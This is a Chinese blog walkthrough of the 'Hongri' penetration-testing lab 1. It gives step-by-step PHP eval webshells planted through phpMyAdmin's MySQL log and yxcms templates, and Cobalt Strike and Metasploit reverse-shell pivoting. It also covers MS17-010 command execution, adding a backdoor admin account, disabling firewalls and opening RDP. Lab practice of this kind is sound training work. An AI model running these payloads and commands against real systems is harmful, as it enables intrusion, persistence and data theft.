首页 > 其他分享 >红日靶场1

红日靶场1

时间:2024-07-06 16:43:13浏览次数:10  
标签:红日 domain set 查看 ip 192.168 靶场 net

一、环境搭建

说明:虚拟机所有初始密码都为hongrisec@2019(后面需要改密码,自己设置)

这里设置两个网卡,配置如下:
image

三台虚拟机以及攻击机ip如下:

kali机:192.168.230.131(VMnet8 网卡随机分配的IP)
win7:192.168.230.153**(外网ip)**,192.168.52.143**(内网ip)**
Windows 2008 (域控):192.168.52.138(内网)
Win2k3 (域管):192.168.52.141(内网)

(1)win7环境配置

修改如下配置:

image

尝试ping外网和内网机(win 2008),都能ping通,这里还有一点就是要把这个防火墙关闭,否则kali会ping不通

image

开启phpstudy(路径在C盘下面),可以正常访问探针

image

(2)win 2008环境配置

输入密码显示需要更改密码,随意更改密码就行

image

win 2008的ip如下图:

image

(3)Win2k3环境配置

这里也是一样,需要更改密码,密码随意

image

ip为192.168.236.141 与外网不连通

image

二、外网渗透

(1)信息收集

在外网通过目录扫描,发现phpmyadmin登录口

image

使用弱口令root/root成功进入

image

在里面看见了mysql数据库和一个 yxcms的数据库,应该也存在一个搭建的yxcms服务

(2)phpmyadmin后台getshell

phpmyadmin有两种getshell方式:

1、into outfile导出木马
2、利用Mysql日志文件getshell

1、尝试into outfile导出木马(失败)

查询网站路径:

select @@basedir;

image

可以看到网站路径为:C:/phpStudy/MySQL/

再尝试将木马写入到www网站根目录下:

select '<?php eval($_POST[cmd]);?>' into outfile 'C:/phpStudy/www/hack.php';

发现写入不了

image

也可以直接尝试查看数据库是否有导入权限,看能否直接导入木马

show global variables like 'secure%';    //为了查询secure_file_priv
当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权
当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/目录下,此时也无法提权
当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权!

此时查询结果为NULL,所以不能写入

image

2、利用Mysql日志文件getshell

首先查询是否有开启日志

show variables like '%general%';

image

日志记录功能关闭,但是可以开启,命令如下:

SET GLOBAL general_log='on';

命令执行后,再查看日志状态,开启成功

image

开启后将日志文件的存储位置改为可访问到的目录, 根目录即可

set global general_log_file = 'C:/phpStudy/WWW/hack.php'

执行下边一句话木马 ,数据库将会将查询语句保存在日志文件中

SELECT '<?php @eval($_POST["hack"]);?>'

尝试蚁剑链接,成功上传

image

image

(3)yxcms后台getshell

上面信息收集发现有个yxcms,同时我们进入后台之后,可以看到一个 beifen.rar备份文件和yxcms目录,这里也有个getshell的方法,这里我们也记录一下。

image

可以看到在公告处,泄露了 yxcms的admin后台登录路径 以及 默认的密码

image

登陆成功后,在前台模板出看见有很多的php文件的模板,写入shell

image
image

现在需要找到文件上传到哪了,可以找找前面提到的 beifen.rar 备份文件
在备份文件直接搜索原来存有的文件,就能轻易知道文件路径了
最后的路径为:yxcms/protected/apps/default/view/default

image

蚁剑连接 成功拿到shell

image

三、内网信息收集

(1)CS上线

kali运行CS

./teamserver 攻击Ip 123456(密码)

image

主机运行CS 客户端并连接 CS 服务端,配置好listener监听器之后,生成 exe后门程序

image

image

直接使用蚁剑上传后门

image

直接使用蚁剑运行后门文件,CS成功上线

image

这里可以执行个 sleep 0,不然回显会很慢

image

这里尝试直接提权

image

提权成功

image

可以看到域控的文件 我们可以进行上传文件操作,下面再看看其他方法 横向移动拿到域控和域内其他机器

image

(3)域内信息收集

内网信息收集的主要目的就是查找域控以及域内的其他主机

net view                 # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器主机名(可能有多台)

查看有几个域存在

image

四、内网渗透

(1)cs与msf联动

首先在msf上监听自己的ip跟端口:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http(跟cs上选用的payload一样)
set lhost 本机ip
set lport 接受的端口
exploit

image

然后cs那边创建一个foreign监听的listeners。

Listeners的ip为msf的ip,端口为msf监听的端口

image

然后,回到cs上,选中拿下的计算机会话,右键选中新建会话,然后在弹出来的框中选择刚刚创建的foreign监听器,然后执行。

image

此时,msf下即可看到已经拿到了一个新的会话。

image

为了使除了msf的其它工具也能通过cs反弹过来的会话进入内网,msf建立需要建立socks反向代理
(正向代理就是指内网机器如果不能直接连到外网,建立正向代理可以连到外网,而反向代理则相反,是外网主机想要进入内网建立的代理)

首先新建路由

run post/multi/manage/autoroute

查看路由

run autoroute -p

image

先执行background 命令将当前执行的 Meterpreter 会话切换到后台(后续也可执行sessions -i 重新返回会话),然后使用 MSF 自带 auxiliary/scanner/portscan/tcp 模块扫描内网域成员主机 192.168.52.138 开放的端口:

background
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.138
set ports 80,135-139,445,3306,3389
run

192.168.52.138 win2003域成员机开启了 135、139、445端口

image

同理扫描一下win2008,开启了80、135、139、445端口

image

(2)MSF进行ms17-010攻击

开放了445端口可以用MS17_010(永恒之蓝)攻击试一下

search ms17_010   //找出ms17_010的攻击模块
use auxiliary/scanner/smb/smb_ms17_010   //此模块失败
set rhosts 192.168.52.138
run

image

最后使用下面模块,可以成功命令执行

use auxiliary/admin/smb/ms17_010_command
set COMMAND net user
set RHOST 192.168.52.141
exploit

image

试着添加用户

set COMMAND net user hack hack /add

发现添加不成功,后来发现是因为有密码设置策略,密码不能太简单且不能包含用户名

set COMMAND net user hack zkm@2024

成功添加

image

然后把添加的用户加入管理员组

set COMMAND net localgroup administrators hack /add

添加成功

image

接着把防火墙关了

#关闭防火墙
netsh firewall set opmode disable   			#winsows server 2003 之前
netsh advfirewall set allprofiles state off 	#winsows server 2003 之后

试着开启3389服务

#注册表开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

#添加防火墙规则
netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389

这里不知道为啥3389端口打不开,尼玛

标签:红日,domain,set,查看,ip,192.168,靶场,net
From: https://www.cnblogs.com/pa0fu/p/18287429

相关文章

  • 搭建高效攻防靶场vulfocus与Docker仓库管理实战:从听说到入门系列
    搭建高效攻防靶场vulfocus与Docker仓库管理实战:从听说到入门系列vulfocus简介vulfocus,作为一款前沿的漏洞集成平台,它巧妙地将多种最新的CVE漏洞环境封装于Docker容器之中,便于部署与操作,成为提升安全实战技能的理想靶场。用户既可选择在本地VMware环境中亲手搭建,享受从零到一的......
  • 实战篇——SQL注入sqli-labs-master靶场实战三
    实战篇——SQL注入sqli-labs-master靶场实战(3)sqlmap基础用法GET型:POST型:请求头注入(以User-Agent注入为例):爆库:pythonsqlmap.py-rC:\Users\yaogu\Desktop\sqlmap\request\1.txt--threads10--dbs爆表:pythonsqlmap.py-rC:\Users\yaogu\Desktop\sqlmap......
  • 实战篇——SQL注入sqli-labs-master靶场实战二
    实战篇——SQL注入sqli-labs-master靶场实战(2)SQL注入的高级利用(1)宽字节注入有时后端会对用户输入的特殊字符进行转义处理,这时普通的注入方式就会失效。对于成对的单引号'',可以通过十六进制编码的方式绕过转义;而对于单个的单引号',当数据库的编码格式为GBK时,就要用到宽字节......
  • 实战篇——SQL注入sqli-labs-master靶场实战一
    实战篇——SQL注入sqli-labs-master靶场实战(1)SQL注入的原理没有对用户的输入进行合法性判断或过滤,而是直接将其拼接至SQL查询语句当中作为命令执行,从而导致非法操作。SQL注入的检测也就是闭合方式的判断,根据报错信息的不同情况可以分为3类——(1)有报错信息(2)无报错信息,但......
  • 什么是未授权访问漏洞?Hadoop & Redis靶场实战——Vulfocus服务攻防
    什么是未授权访问漏洞?Hadoop&Redis靶场实战——Vulfocus服务攻防一、介绍未授权访问,也称为未经授权的访问或非法访问,是指在没有得到适当权限或授权的情况下,个人或系统访问了网络、计算机、数据库、文件、应用程序或其他受保护资源的行为。这种访问可能出于恶意或非恶意的目......
  • DVWA 靶场 JavaScript 通关解析
    前言DVWA代表DamnVulnerableWebApplication,是一个用于学习和练习Web应用程序漏洞的开源漏洞应用程序。它被设计成一个易于安装和配置的漏洞应用程序,旨在帮助安全专业人员和爱好者了解和熟悉不同类型的Web应用程序漏洞。DVWA提供了一系列的漏洞场景和练习环境,用户可以通过......
  • DVWA 靶场 CSP Bypass 通关解析
    前言DVWA代表DamnVulnerableWebApplication,是一个用于学习和练习Web应用程序漏洞的开源漏洞应用程序。它被设计成一个易于安装和配置的漏洞应用程序,旨在帮助安全专业人员和爱好者了解和熟悉不同类型的Web应用程序漏洞。DVWA提供了一系列的漏洞场景和练习环境,用户可以通过......
  • Goldeneye_v1靶场实操
    Goldeneye靶场实操靶场信息下载靶机后用vm打开即可goldeneye靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/靶机发布日期:2018年5月4日靶机描述:靶机命名来自詹士邦系列的电影——GoldenEye目标:得到root权限&找到flag.txtkali:192.168.1.131靶机:192.168.1.141......
  • DVWA 靶场 Open HTTP Redirect 通关解析
    前言DVWA代表DamnVulnerableWebApplication,是一个用于学习和练习Web应用程序漏洞的开源漏洞应用程序。它被设计成一个易于安装和配置的漏洞应用程序,旨在帮助安全专业人员和爱好者了解和熟悉不同类型的Web应用程序漏洞。DVWA提供了一系列的漏洞场景和练习环境,用户可以通过......
  • DVWA 靶场 Authorisation Bypass 通关解析
    前言DVWA代表DamnVulnerableWebApplication,是一个用于学习和练习Web应用程序漏洞的开源漏洞应用程序。它被设计成一个易于安装和配置的漏洞应用程序,旨在帮助安全专业人员和爱好者了解和熟悉不同类型的Web应用程序漏洞。DVWA提供了一系列的漏洞场景和练习环境,用户可以通过......